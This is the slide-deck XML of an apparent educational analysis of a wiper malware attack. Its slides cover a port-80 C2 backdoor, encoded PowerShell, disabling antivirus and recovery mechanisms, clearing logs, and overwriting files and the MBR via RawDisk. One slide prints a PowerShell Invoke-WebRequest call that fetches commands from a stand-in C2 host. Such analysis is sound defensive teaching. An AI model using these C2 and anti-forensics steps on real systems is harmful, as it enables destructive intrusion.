                                          <p:spTgt spid="9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30"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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32"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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33"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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35"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="927"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="943"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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par>
                                <p:cTn fill="hold" nodeType="with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par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="941"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="944"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="945"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="946"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="947"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="948"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="950"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="withEffect" presetClass="entr" presetID="10" presetSubtype="0">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="951"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="951"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="withEffect" presetClass="entr" presetID="10" presetSubtype="0">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="952"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="952"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="954"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="withEffect" presetClass="entr" presetID="10" presetSubtype="0">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="953"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6682650" y="1675524"/>
            <a:ext cx="2396412" cy="1851336"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="202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960" name="Google Shape;960;p3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C2 / Establishing a Backdoor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="961" name="Google Shape;961;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1322700"/>
            <a:ext cx="38520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lissvr</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>.exe</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Backdoor on port 80 (HTTP)</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Connection to C2 server</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="962" name="Google Shape;962;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719975" y="3818650"/>
            <a:ext cx="6400200" cy="6333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Invoke-WebRequest -Uri "http://c2-server.com/cmd" -Headers @{Authorization="Basic dXNlcjpwYXNzd29yZA=="}</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Public Domain Clip Art Image | database symbol | ID ..." id="963" name="Google Shape;963;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4344525" y="2417999"/>
            <a:ext cx="652875" cy="721024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="964" name="Google Shape;964;p38" title="Desktop computer monochrome clip art | Free SVG"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7911070" y="2474337"/>
            <a:ext cx="844125" cy="844151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="965" name="Google Shape;965;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5560625" y="1225275"/>
            <a:ext cx="721024" cy="721024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="966" name="Google Shape;966;p38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4890300" y="1714500"/>
            <a:ext cx="603900" cy="623400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:srgbClr val="D8313A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="967" name="Google Shape;967;p38"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="963" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4997400" y="2778512"/>
            <a:ext cx="1607400" cy="7500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:srgbClr val="6AA84F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="968" name="Google Shape;968;p38" title="Desktop computer monochrome clip art | Free SVG"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6927970" y="2356437"/>
            <a:ext cx="844125" cy="844151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="969" name="Google Shape;969;p38" title="Desktop computer monochrome clip art | Free SVG"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7631370" y="1821662"/>
            <a:ext cx="844125" cy="844151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="970" name="Google Shape;970;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4147613" y="3116025"/>
            <a:ext cx="1046700" cy="372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C2 Server</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="971" name="Google Shape;971;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7004100" y="3200600"/>
            <a:ext cx="1607400" cy="372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Internal Network</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="972" name="Google Shape;972;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226625" y="2418000"/>
            <a:ext cx="1046700" cy="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HTTP Traffic</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="973" name="Google Shape;973;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2700000">
            <a:off x="4229865" y="1724201"/>
            <a:ext cx="1488743" cy="29231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VPNs / proxies</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="974" name="Google Shape;974;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="2990625"/>
            <a:ext cx="38520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Encoded Powershell Commands</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>“Nothing to see here…”</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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="959"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="961"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="964"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="968"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="withEffect" presetClass="entr" presetID="10" presetSubtype="0">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="969"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="969"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="967"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="970"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="966"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="973"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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Preparations to Wipe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="980" name="Google Shape;980;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396050" y="1586525"/>
            <a:ext cx="7020600" cy="3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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300"/>
              <a:t>Disable AV</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="981" name="Google Shape;981;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396050" y="2560426"/>
            <a:ext cx="7704000" cy="3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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300"/>
              <a:t>Disable Recovery Mechanisms</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="982" name="Google Shape;982;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396050" y="3534326"/>
            <a:ext cx="7704000" cy="3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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300"/>
              <a:t>Clear System Logs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="983" name="Google Shape;983;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5944550" y="623075"/>
            <a:ext cx="2561474" cy="2526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4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Wiping Process, use of RawDisk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="989" name="Google Shape;989;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1322700"/>
            <a:ext cx="38520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File Deletion</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>RawDisk has access to physical hard drive sectors</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Overwriting system files, OS, etc.</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="990" name="Google Shape;990;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="2822150"/>
            <a:ext cx="38520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Master Boot Record (MBR) Overwrite</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Responsible for booting OS</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Without this, a computer is a brick</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991" name="Google Shape;991;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751550" y="1268738"/>
            <a:ext cx="1784400" cy="1734600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4CC9F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latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>User Files</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Albert Sans"/>
              <a:ea typeface="Albert Sans"/>
              <a:cs typeface="Albert Sans"/>
              <a:sym typeface="Albert Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="992" name="Google Shape;992;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751550" y="3003350"/>
            <a:ext cx="1784400" cy="375000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4361E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latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>System / OS Files</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Albert Sans"/>
              <a:ea typeface="Albert Sans"/>
              <a:cs typeface="Albert Sans"/>
              <a:sym typeface="Albert Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="993" name="Google Shape;993;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751550" y="3378350"/>
            <a:ext cx="1784400" cy="191700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A0CA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1"/>
                </a:solidFill>
                <a:latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
